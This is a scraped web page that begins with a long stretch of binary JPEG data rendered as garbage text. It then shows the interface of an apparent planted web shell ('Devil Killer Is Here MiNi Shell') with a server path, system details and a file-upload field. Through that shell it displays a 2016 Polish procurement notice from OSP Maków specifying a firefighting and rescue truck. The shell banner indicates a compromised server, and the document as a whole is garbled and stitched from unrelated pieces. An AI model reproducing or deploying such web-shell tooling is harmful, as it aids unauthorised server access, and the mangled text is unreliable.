JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160909/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160909/307215-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 307215 - 2016
              z dnia 2016-09-09 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Maków: Dostawa średniego samochodu ratowniczo-gaśniczego dla jednostki OSP w Makowie<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Ochotnicza Straż Pożarna w Makowie, krajowy numer identyfikacyjny
              75006583000000, ul.
              ul. Przemysłowa 
              2,
              96124  
              Maków, woj.
              łódzkie, państwo
              , tel.
              46 831 20 17, e-mail
              ospmakow2016@wp.pl, faks
              46 831 20 09.
              <br />
              Adres strony internetowej (URL): <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Stowarzyszenie</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://makow.bipst.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Pocztą, osobiście, kurierem<br />
                Adres:
                <br />Urząd Gminy Maków, ul. ul. Główna 12, 96-124 Maków</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa średniego samochodu ratowniczo-gaśniczego dla jednostki OSP w Makowie<br /><b>Numer referencyjny: </b>RI.271.1.2016.OSP<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>L.P
	WYMAGANIA MINIMALNE ZAMAWIAJĄCEGO
I.	WYMAGANIA PODSTAWOWE
1.1	Pojazd powinien spełniać wymagania polskich przepisów o ruchu drogowym zgodnie z Ustawą Prawo o ruchu drogowym z uwzględnieniem wymagań dotyczących pojazdów uprzywilejowanych
1.2	Pojazd powinien spełniać przepisy Polskiej Normy PN-EN 1846-1oraz PN-EN 1846-2.
1.3	Pojazd powinien spełniać Wymagania techniczno-użytkowe dla wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, wprowadzanych do użytkowania w jednostkach ochrony przeciwpożarowej -Rozporządzenie Ministra Spraw Wewnętrznych i Administracji -Dz.U. Nr 143 poz. 1002 z 2007r , i  Rozporządzenie  zmieniające-Dz.U. Nr 85 poz 553 z 2010r.
1.4	Samochód musi posiadać świadectwo dopuszczenia wyrobu, do stosowania w jednostkach ochrony przeciwpożarowej wydany przez polską jednostkę certyfikującą.  Świadectwo ważne na dzień składania ofert .Należy potwierdzić spełnienie wymagań i załączyć kompletne świadectwo dopuszczenia  do oferty  (dwie strony).
II.	PARAMETRY TECHNICZNO  UŻYTKOWE
2.1	Maksymalna masa rzeczywista  samochodu gotowego do  akcji ratowniczo-gaśniczej (pojazd z załogą, pełnymi zbiornikami, zabudową i wyposażeniem) - do 16 000kg.
2.2	Samochód wyposażony w silnik wysokoprężny o mocy min. 290 KM.
III.	PODWOZIE Z KABINĄ
3.1	Samochód fabrycznie nowy,  rok produkcji  2016.     Podać markę, typ i model
3.2	Samochód wyposażony w podwozie drogowe  w układzie napędowym:
 4x4  uterenowiony z :
	przekładnią rozdzielczą z możliwością wyboru przełożeń  szosowych i terenowych;
	blokadą mechanizmu różnicowego tylnego mostu, przedniego mostu oraz z blokadą mechanizmu międzyosiowego
	napęd stały osi przedniej;
	na osi przedniej koła pojedyncze , na osi tylnej  koła   podwójne;
3.3	Samochód  wyposażony w:
	system  ABS- z możliwością odłączenia podczas    jazdy w  terenie;
	silnik wyposażony w hamulec silnikowy;      
	skrzynia biegów manualna, 6 biegowa plus bieg wsteczny, 
3.4	 Kabina jednomodułowa czterodrzwiowa, zapewniająca dostęp do  silnika,  w układzie miejsc 1+1+4   (siedzenia przodem  do kierunku jazdy).
Kabina wyposażona w :
	klimatyzację;
	indywidualne oświetlenie  do czytania mapy dla pozycji dowódcy;
	niezależny układ ogrzewania, umożliwiający ogrzewanie kabiny przy wyłączonym silniku;
	reflektor pogorzeliskowy na zewnątrz kabiny z gniazdem elektrycznym z prawej strony;
	poręcz do trzymania w tylnej części kabiny;
	zewnętrzną osłonę przeciwsłoneczną z przodu  dachu kabiny;
	elektrycznie sterowane szyby po stronie kierowcy i dowódcy;
	elektrycznie sterowane lusterka po stronie kierowcy i dowódcy;
Kabina wyposażona dodatkowo w:
	uchwyty na 4 aparaty  oddechowe umieszczone w oparciach tylnych siedzeń;
	odblokowanie każdego aparatu indywidualnie;
	dźwignia odblokowująca o konstrukcji uniemożliwiającej przypadkowe odblokowanie np. w czasie hamowania pojazdu;
	uchwyty na aparaty  nie powinny zmniejszać  przestrzeni załogi; 
	w przypadku gdy aparaty nie są przewożone, wstawienie oparć w miejscu mocowania aparatów;
	schowek pod siedzeniami w tylnej części kabiny.
3.5	Fotele wyposażone w pasy bezpieczeństwa. Siedzenia pokryte materiałem  łatwozmywalnym, o zwiększonej odporności na  ścieranie. Fotele wyposażone w zagłówki. 
Fotele dla kierowcy i pasażera (dowódcy) z regulacją wysokości, odległości  i pochylenia oparcia.  
3.6	W kabinie kierowcy  zamontowane następujące urządzenia:
	radiotelefon samochodowy o parametrach: częstotliwość VHF 136-174 MHz, moc 1÷25 W, odstęp międzykanałowy 12,5 kHz dostosowany do użytkowania w sieci MSWiA ,min 255 kanałów, wyświetlacz alfanumeryczny min 14 znaków. Obrotowy potencjometr siły głosu;
	 radio z odtwarzaczem CD i MP3;
	podest do ładowarek radiostacji przenośnych i latarek z wyłącznikiem.
3.7	Dodatkowe urządzenia  zamontowane w kabinie:
	sygnalizacja otwarcia żaluzji skrytek i podestów;
	sygnalizacja informująca o wysunięciu masztu;
	sygnalizacja załączonego gniazda ładowania;
	główny wyłącznik oświetlenia skrytek;
	sterowanie zraszaczami;
	sterowanie niezależnym ogrzewaniem kabiny i przedziału  pracy autopompy;
	kontrolka włączenia autopompy;
	wskaźnik poziomu wody w zbiorniku;
	wskaźnik poziomu środka pianotwórczego w zbiorniku;
	wskaźnik  niskiego  ciśnienia;
	wskaźnik  wysokiego  ciśnienia.
3.8	Pojazd  wyposażony w urządzenie sygnalizacyjno- ostrzegawcze (akustyczne i świetlne), pojazdu uprzywilejowanego. Urządzenie akustyczne powinno umożliwiać podawanie komunikatów słownych.
Sterowanie przy pomocy manipulatora na elastycznym przewodzie ,zmiana modulacji dźwiękowej sygnału  poprzez klakson pojazdu, manipulator powinien być funkcjonalny, czytelny  i posiadać wyraźne, podświetlane  oznaczenia trybu pracy w ciągu  dnia i nocy.
Wymagana funkcjonalność podstawowa:
	 załączenie sygnałów dźwiękowych i świetlnych jednym przyciskiem;
	wyłączenie sygnałów dźwiękowych;
	wyłączenie sygnałów dźwiękowych, świetlnych;
	Na dachu kabiny zamontowana wyprofilowana nadbudowa z zamontowaną lampą zespoloną z napisem STRAŻ  płaską z głośnikiem , umieszczoną w nakładce kompozytowej dachu kabiny i dwie wyprofilowane lampy niebieskie LED wbudowane w nakładkę kompozytową lub układ równoważny (z  zabezpieczeniem ochronnym); 
	dodatkowe 2 lampy sygnalizacyjne niebieskie  LED  z przodu pojazdu; 
	zabudowę nadwozia wyposażyć w  4  lampki niebieskie diodowe pulsujące umieszczone po dwie na każdą stronę - u góry nadwozia wbudowane w nakładkę kompozytową, połączone w systemie z pulsacyjnymi z przodu;
	na ścianie tylnej pojazdu wbudowane w naroża nakładek kompozytowych, wyprofilowane dwie specjalne lampy niebieskie lub układ równoważny (z  zabezpieczeniem ochronnym); 
	 fala świetlna LED wbudowana w nakładkę kompozytową umieszczona na tylnej ścianie nadwozia;
	na ścianie tylnej w dolnej części nadwozia z lewej i prawej strony zamontowane  wyprofilowane   dwie specjalne nakładki kompozytowe z zamontowanymi lampami zespolonymi tylnymi z zabezpieczeniami ochronnymi   lub układ równoważny.
3.9	Instalacja elektryczna  wyposażona w główny wyłącznik prądu.
3.10	Pojazd  wyposażony w integralny układ  do ładowania  akumulatorów z zewnętrznego  źródła ~230V, 
z gniazdem przyłączeniowym z wyrzutnikiem z wtyczką i przewodem  umieszczonym po lewej stronie .
Ładowarka-prostownik zamontowana na samochodzie. Złącze musi być samo rozłączalne w momencie  rozruchu silnika. W kabinie kierowcy sygnalizacja  podłączenia instalacji  do zewnętrznego źródła.  
3.11	Pojazd  wyposażony w zewnętrzne szybkozłącze do uzupełniania powietrza w układzie pneumatycznym z sieci  stacjonarnej.
  3.12	Pojazd  wyposażony w sygnalizację świetlną i dźwiękową włączonego biegu wstecznego (jako sygnalizację świetlną dopuszcza się światło cofania).
3.13	Pojazd  wyposażony w sygnał pneumatyczny, włączany dodatkowym włącznikiem z miejsca dostępnego dla kierowcy i dowódcy.
3.14	 Wylot spalin skierowany na lewą stronę.
3.15
	Pojazd wyposażony w hak holowniczy, paszczowy typu Rockinger lub równoważny , przystosowany do ciągnięcia przyczep, zgodnie z homologacją podwozia, o masie min. 10 ton.  Złącza elektryczne i pneumatyczne muszą współpracować z przyczepą wyposażoną w ABS i EBS. Instalacja elektryczna musi współpracować z przyczepami wyposażonymi w ledowe źródła światła.
3.16	Ogumienie uniwersalne, szosowo-terenowe z bieżnikiem dostosowanym do różnych warunków atmosferycznych
3.17	Pełnowymiarowe koło zapasowe  na wyposażeniu pojazdu 
Dopuszcza się brak stałego zamocowania w pojeździe    
                                                                                                                               
3.18	Kolory samochodu:
	elementy podwozia, rama  w kolorze czarnym lub zbliżonym; 
	błotniki i zderzaki  w kolorze białym;
	żaluzje skrytek  w kolorze naturalnym aluminium;
	kabina, zabudowa w kolorze czerwonym RAL 3000.
IV.	ZABUDOWA POŻARNICZA
4.1	Maksymalna wysokość całkowita pojazdu wraz z zainstalowanym wyposażeniem na dachu -3150mm (ze względu na wysokość garażu)
Zabudowa nadwozia wykonana z materiałów odpornych na korozję.
Balustrady ochronne boczne dachu wykonane  ze specjalnych profilowanych materiałów kompozytowych.
Wewnętrzne poszycia skrytek wykonane  z anodowanej blachy aluminiowej.
Po trzy skrytki na bokach pojazdu (w układzie 3+3+1).
Pomiędzy kabiną a zabudową pożarniczą zamontowana kompozytowa osłona  ochronno-maskująca.
4.2	Wymagane otwierane lub wysuwne podesty pod wszystkimi schowkami bocznymi zabudowy, które  umożliwią   łatwy i bezpieczny  dostęp do sprzętu położonego w górnych partiach schowków, na całej długości zabudowy .
Musi być zainstalowany podest otwierany lub wysuwny  nad kołami tylnymi po obu stronach zabudowy.   
4.3	Otwarcie lub wysunięcie podestu, musi być sygnalizowane w kabinie kierowcy. 
Otwierane lub wysuwne podesty poza obrys pojazdu, muszą  posiadać oznakowanie ostrzegawcze.
4.4	Skrytki na sprzęt i przedział autopompy wysokociśnieniowej  wyposażone w oświetlenie - podwójne listwy LED, umieszczone pionowo po obu stronach schowka, przy prowadnicy żaluzji, włączane automatycznie po otwarciu  drzwi-żaluzji skrytki. W kabinie zamontowana sygnalizacja otwarcia skrytek.
Główny wyłącznik oświetlenia skrytek, zainstalowany w kabinie kierowcy.
4.5	Dolne skrytki otwierane przez podesty boczne - także wyposażone  w oświetlenie - listwy LED włączane automatycznie po otwarciu podestu. 
W kabinie zamontowana sygnalizacja otwarcia skrytek.
4.6	Pojazd posiada oświetlenie pola pracy wokół samochodu:
	oświetlenie składające się z lamp bocznych do oświetlenia dalszego pola pracy wbudowane w kompozytowe balustrady boczne i zewnętrznych listew LED, zamontowanych nad żaluzjami  do oświetlenia pola  przy pojeździe;  
	w kabinie musi być zainstalowany włącznik do  załączenia oświetlenia zewnętrznego, z możliwością sterowania  oświetleniem z tablicy autopompy;
	 pojazd  posiada oświetlenie powierzchni dachu;
	 oświetlenia włączane z przedziału autopompy. 
   
4.7	Szuflady i wysuwane tace  automatycznie blokują się w pozycji wsuniętej   i całkowicie wysuniętej            i posiadają zabezpieczenie  przed całkowitym wyciągnięciem.
Szuflady i tace wystające w pozycji otwartej powyżej 250 mm poza obrys pojazdu, posiadają  oznakowanie ostrzegawcze.
4.8	Półki sprzętowe wykonane z aluminium, w systemie z możliwością regulacji położenia (ustawienia) wysokości półek-w zależności od potrzeb.
4.9	Schowki wyposażone w regały  wysuwne lub obrotowe na urządzenie ratownicze, agregat prądotwórczy 
Regał obrotowy lub wysuwny wyposażony w zestaw sprzętu m.in :
	łom zwykły -1szt
	łomo-wyciągacz -1szt
	młotek 2 kg - 1szt
	młot 4kg  1 szt
	siekiera -1szt
	nożyce do drutu -1szt
4.10	Skrytki na sprzęt i wyposażenie zamykane żaluzjami aluminiowymi. Drzwi żaluzjowe wyposażone w zamki - jeden klucz pasuje do wszystkich zamków. Wymagane dodatkowe zabezpieczenie przed przypadkowym otwarciem żaluzji.
4.11	Dach zabudowy  wykonany w formie podestu roboczego w wykonaniu antypoślizgowym .Balustrada ochronna boczna dachu wykonana  ze specjalnych profilowanych materiałów kompozytowych  jako  nierozłączna część z nadbudową pożarniczą, o wysokości min 80 mm 
4.12	Na dachu pojazdu zamontowana zamykana skrzynia aluminiowa na drobny sprzęt o wymiarach w przybliżeniu 1400x460x270 mm, posiadająca oświetlenie wewnętrzne typu LED, oraz  uchwyty z rolkami  na drabinę dwuprzęsłową wysuwną z podporami ,uchwyty na węże ssawne, bosak, mostki przejazdowe, tłumice itp.
4.13	Pojazd  posiada  drabinkę do wejścia na dach z tyłu samochodu ,wykonana z materiałów nierdzewnych,   umieszczoną po prawej stronie .W górnej części drabinki zamontowane poręcze ułatwiające wchodzenie. 
4.14	Powierzchnie platform, podestów roboczych i podłogi  kabiny w wykonaniu antypoślizgowym
4.15	Zbiornik wody o pojemności min. 3 m3, wykonany  z  materiałów kompozytowych.     
 Tolerancja pojemności  1%          
Zbiornik  wyposażony w oprzyrządowanie umożliwiające jego bezpieczną  eksploatację, z układem  zabezpieczającym przed swobodnym wypływem wody w czasie  jazdy. Zbiornik  wyposażony w  falochrony i  właz rewizyjny.
4.16	Zbiornik wody wyposażony w nasadę 75, umiejscowioną na prawym  boku  z tyłu pojazdu 
Wlot do napełniania z hydrantu wyposażony w zawór odcinający oraz sito.
Zbiornik wyposażony  w urządzenie przelewowe zabezpieczające przed uszkodzeniem podczas napełniania.
Układ zbiornika wyposażony w  automatyczny zawór napełniania hydrantowego zabezpieczającego  przed przepełnieniem zbiornika wodnego z możliwością przełączenia na pracę ręczną.
4.17	Zbiornik środka pianotwórczego, wykonany z materiałów kompozytowych, odpornych na działanie dopuszczonych do stosowania środków pianotwórczych i modyfikatorów o pojemności 10% pojemności zbiornika wodnego. Tolerancja pojemności 1%.
Napełnianie zbiornika środkiem pianotwórczym,  możliwe z poziomu terenu i z dachu pojazdu.
4.18	Układ wodno-pianowy  wyposażony w ręczny lub automatyczny  dozownik środka pianotwórczego dostosowany do wydajności autopompy, zapewniający uzyskiwanie co najmniej  stężeń 3% i 6% (tolerancja + 0,5%) w całym zakresie pracy.   
4.19	Autopompa  zlokalizowana z tyłu pojazdu w obudowanym przedziale, zamykanym drzwiami żaluzjowymi    
4.20	Autopompa dwuzakresowa ze stopniem  wysokiego ciśnienia.
	wydajność , min. 2500l/min, przy ciśnieniu  8 bar i głębokości ssania 1,5m;
	wydajność  stopnia wysokiego ciśnienia, min. 400 l/min  przy ciśnieniu  40 bar;
Należy wpisać parametry z dołączonego  świadectwa CNBOP  do oferty.                   
4.21	Autopompa  umożliwia podanie wody i wodnego roztworu środka pianotwórczego do minimum:
	dwóch nasad tłocznych 75 zlokalizowanych z tyłu pojazdu, po bokach w zamykanych schowkach;
	 wysokociśnieniowej linii szybkiego natarcia;
	 działka wodno  pianowego;
	zraszaczy;                                  
Autopompa  umożliwia podanie wody do zbiornika samochodu.
Autopompa  wyposażona w urządzenie odpowietrzające umożliwiające zassanie wody:
	 z głębokości 1,5 m w czasie do 30 sek.
	 z głębokości 7,5 m w czasie do 60 sek.
Autopompa  wyposażona w  układ utrzymywania stałego ciśnienia tłoczenia, umożliwiający sterowanie z regulacją automatyczną i ręczną ciśnienia pracy oraz automatyczny sterownik zabezpieczający przed suchobiegiem pompy. 
Układ wodno-pianowy wyposażony w system zabezpieczający przed przeciążeniami hydraulicznymi z programem odciążającym układ w przypadku zamknięcia przepływu środków gaśniczych przy załączonej autopompie.
4.22	Na wlocie ssawnym autopompy zamontowany element zabezpieczający przed przedostaniem się do pompy zanieczyszczeń stałych zarówno przy ssaniu ze zbiornika zewnętrznego jak i ze zbiornika własnego pojazdu, gwarantujący bezpieczną eksploatację pompy.
4.23	W przedziale autopompy  znajdują się co najmniej następujące urządzenia kontrolno - sterownicze pracy pompy:
	manowakuometr;
	manometr niskiego ciśnienia;
	manometr wysokiego ciśnienia; 
	wskaźnik poziomu wody w zbiorniku samochodu;
	wskaźnik poziomu środka pianotwórczego w zbiorniku;
	regulator prędkości obrotowej silnika pojazdu;
	miernik prędkości obrotowej wału pompy;
	wyłącznik silnika pojazdu;
	kontrolka  ciśnienia oleju i   temperatury cieczy chłodzącej silnik;
	kontrolka włączenia autopompy;
	licznik motogodzin pracy autopompy.
W przedziale autopompy należy zamontować zespół:
	sterowania automatycznym  układem utrzymywania stałego ciśnienia tłoczenia, umożliwiający      sterowanie z regulacją automatyczną i ręczną ciśnienia pracy;
	sterownia automatycznym zaworem napełniania hydrantowego  zabezpieczającym przed przepełnieniem zbiornika wodnego z możliwością przełączenia na pracę ręczną;
	sterowania ręcznym lub automatycznym  układem dozowania środka pianotwórczego  w całym zakresie pracy autopompy. 
4.24	W przedziale pracy  autopompy, na tablicy sterującej ,wymagane są   zamontowane włączniki do uruchamiania silnika pojazdu,  załączenia i wyłączenia autopompy oraz wyłączania silnika pojazdu.  Włączniki muszą  być aktywne  przy neutralnej pozycji skrzyni biegów i załączonym ręcznym hamulcu postojowym.
4.25	Przedział pracy autopompy  wyposażony w dodatkowy zewnętrzny głośnik z mikrofonem, połączony z radiotelefonem samochodowym.
4.26	Przedział pracy autopompy  wyposażony w system ogrzewania  działający niezależnie od pracy silnika. Montaż sterowania ogrzewaniem z kabiny kierowcy.
4.27	Wszystkie elementy układu wodno-pianowego , odporne na korozję i działanie dopuszczonych do stosowania środków pianotwórczych i modyfikatorów.
4.28	Działko wodno-pianowe o regulowanej wydajności, umieszczone na dachu pojazdu z nakładką do piany . Wydajność działka  od 800 do 1600 l /min,  przy podstawie działka  zamontowany zawór odcinający. Dopuszcza się zastosowanie  zaworu odcinającego  ze sterowaniem elektryczno-pneumatycznym. 
4.29	Samochód  wyposażony w wysokociśnieniową  linię szybkiego natarcia o długości węża min. 60 m, 
umieszczoną na zwijadle, zakończoną prądownicą  wodno-pianową o regulowanej wydajności, 
umożliwiającą podawanie zwartego i  rozproszonego strumienia wody oraz piany.
Linia szybkiego natarcia  umożliwia podawanie wody lub piany z prądownicy bez względu na stopień rozwinięcia węża.
Zwijadło  wyposażone w  napęd elektryczny i ręczny.
Szybkie natarcie wyposażone w pneumatyczny system odwadniania, umożliwiający opróżnienie 
linii przy użyciu sprężonego powietrza.  
4.30	Instalacja układu zraszaczy zasilanych od autopompy:
	min 4 dysze do podawania wody w czasie jazdy; 
	dwa zraszacze zamontowane przed przednią osią;
	dwa zraszacze zamontowane po bokach pojazdu;
Instalacja powinna być wyposażona w zawory odcinające (jeden dla zraszaczy przednich, drugi dla zraszaczy bocznych). 
Montaż sterowania zraszaczami z kabiny kierowcy.
